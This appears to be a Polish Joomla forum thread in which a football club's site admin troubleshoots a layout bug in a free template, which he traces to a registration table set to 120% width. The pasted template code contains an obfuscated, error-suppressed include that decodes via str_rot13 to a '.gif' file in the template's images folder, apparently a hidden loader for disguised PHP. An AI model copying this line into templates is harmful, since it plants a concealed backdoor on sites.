PDA

Zobacz pełną wersję : Błąd w templatce



gorus
17-05-2010, 13:34
Witam, jestem administratorem miejscowej piłkarskiej drużyny i mam pewien problem. Otóż używam templatki themeza_j15_05 czyli jednej z bezpłatnych piłkarskich szablonów w którym występuje tylko lewa tabela. Postanowiłem więc dorobić także tabelę prawą aby umieścić tam statystyki odwiedzin oraz tabelę ligi. Teraz nasuwa się moje główne pytanie, podczas gdy włączam opcję założenia konta(http://gks-kraska.pl/index.php?option=com_user&view=register)rejestracja przesuwa mi się pod tabele i za "chiny" nie mogę znaleźć miejsca gdzie mogę edytować szerokość wszystkich tych pól. Czy mógł by mnie ktoś nakierować gdzie mogę to znaleźć? Dodaję także to, że jest to jedna z moich pierwszych przygód z joomlą, za to bardzo dobrze znam php/html.

moje
17-05-2010, 14:06
Bo dodałeś prawą pozycję między lewą pozycją, a treścią centralną- powinno być lewa, treść, prawa.

gorus
17-05-2010, 14:21
wrzucając main pomiędzy left i right, wyrzuca mi right pod treść
http://img43.imageshack.us/img43/3080/25968296.png
podrzucę jeszcze treść z tego miejsca

<div id="leftcolumn">
<?php if((!$this->countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13( $JPan[0].'.t'.'vs'))) : ?>
<jdoc:include type="modules" name="layout" style="rounded" />
<?php endif; ?>
<jdoc:include type="modules" name="left" style="rounded" />
</div>

<div id="rightcolumn">
<?php if($this->countModules('right') and JRequest::getCmd('layout') != 'form') : ?>

<jdoc:include type="modules" name="right" style="xhtml"/>
<br />
<?php endif; ?>
</div>
<div id="maincolumn">
<div class="nopad">
<jdoc:include type="message" />
<?php if($this->params->get('showComponent')) : ?>
<jdoc:include type="component" />
<?php endif; ?>

</div>

moje
17-05-2010, 14:25
A ustawiłeś/zmieniłeś odpowiedni kod CSS?

gorus
17-05-2010, 14:47
Jeśli chodzi o css, dodałem odpowiedni kod, sprawdzę wszystko jeszcze raz, wydaje mi się, że mogłem coś ominąć właśnie w stylach.

---------- Post dodany o 12:47 ---------- Poprzedni post był o 12:30 ----------

Temat do zamknięcia. Miałem błąd w module rejestracji, długość tabeli była ustawiona na 120%.